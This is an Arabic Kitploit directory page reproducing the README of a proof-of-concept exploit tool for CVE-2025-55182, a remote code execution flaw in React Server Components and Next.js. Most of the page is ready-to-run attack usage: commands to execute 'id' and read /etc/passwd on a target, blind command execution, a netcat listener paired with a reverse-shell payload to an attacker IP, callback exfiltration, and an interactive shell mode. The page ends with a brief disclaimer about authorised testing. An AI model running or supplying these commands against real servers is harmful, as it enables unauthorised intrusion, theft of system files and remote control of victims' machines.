Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
react2shell-poc — CVE-2025-55182 React2Shell PoC - ثغرة RCE حرجة في React Server Components / Next.js. درجة CVSS 10.0. استخراج بيانات قائم على الأخطاء، شل عكسي، وضع تفاعلي. | Kitploit
أدوات/GitHubGitHub/p3ta00/react2shell-poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالتعلم والتعليمأداة الوصول عن بعد
GitHubp3ta00/react2shell-poc

react2shell-poc

CVE-2025-55182 React2Shell PoC - ثغرة RCE حرجة في React Server Components / Next.js. درجة CVSS 10.0. استخراج بيانات قائم على الأخطاء، شل عكسي، وضع تفاعلي.

عرض المستودع
91منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

React2Shell - إثبات المفهوم CVE-2025-55182

إثبات المفهوم لـ CVE-2025-55182، وهي ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد بدون مصادقة في React Server Components.

درجة CVSS: 10.0 (حرجة)

الثغرة

توجد الثغرة في مفكك تسلسل بروتوكول Flight في React. من خلال استغلال تلوث النموذج الأولي عبر حمولات مصممة خصيصًا، يمكن للمهاجم تحقيق تنفيذ تعليمات برمجية عشوائية على تطبيقات Next.js المعرضة للخطر.

الإصدارات المتأثرة

المنتجالمتأثرالمُصحح
React19.0.0 - 19.2.019.0.1, 19.1.2, 19.2.1+
Next.js14.3.0-canary.77 - 16.x15.0.5, 15.1.9, 15.2.6, 16.0.7+

التثبيت

root@kitploit:~
git clone https://github.com/p3ta00/react2shell-poc.git
cd react2shell-poc
pip install requests

الاستخدام

تنفيذ الأوامر مع الإخراج (الافتراضي - استخراج قائم على الأخطاء)

يُعاد الإخراج مباشرة في استجابة HTTP عبر خطأ NEXT_REDIRECT - لا حاجة لخادم رد اتصال.

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -c "id"
python3 react2shell-poc.py -t http://TARGET:3000 -c "cat /etc/passwd"

الوضع التفاعلي

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -i

التحقق من الثغرة

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 --check

RCE أعمى (بدون إخراج)

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -c "touch /tmp/pwned" --blind

قشرة عكسية

root@kitploit:~
# ابدأ المستمع
nc -lvnp 4444

# أرسل الحمولة
python3 react2shell-poc.py -t http://TARGET:3000 --revshell --lhost YOUR_IP --lport 4444

أسلوب قديم: استخراج قائم على رد الاتصال

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -c "id" --listen --lhost YOUR_IP

الخيارات

root@kitploit:~
-t, --target       Target URL (required)
-c, --command      Command to execute (output via error-based exfil by default)
--check            Check if target is vulnerable
--blind            Blind RCE mode (no output capture)
--listen           Use callback server instead of error-based exfil
-i, --interactive  Interactive pseudo-shell mode
--revshell         Attempt reverse shell
--lhost            Attacker IP for callbacks/reverse shell
--lport            Callback port (default: 9999)
--callback         Manual callback URL
--timeout          Request timeout in seconds (default: 30)

كيف يعمل

تستخدم طريقة الاستخراج الافتراضية حقن خطأ NEXT_REDIRECT:

  1. تنفيذ الأمر والتقاط الإخراج
  2. إلقاء خطأ NEXT_REDIRECT مع الإخراج في حقل digest
  3. يقوم Next.js بتسلسل الخطأ في استجابة Flight
  4. يظهر الإخراج مباشرة في جسم استجابة HTTP

هذا أكثر موثوقية من الاستخراج القائم على رد الاتصال لأنه لا يتطلب وصولاً شبكيًا صادرًا من الهدف.

المراجع

  • إفصاح Wiz Security - React2Shell
  • تحليل Datadog Security Labs
  • NVD - CVE-2025-55182

إخلاء مسؤولية

هذه الأداة لأغراض اختبار الأمان المصرح به والتعليم فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. احصل دائمًا على إذن مناسب قبل الاختبار.

المؤلف

p3ta

تنزيل الأداة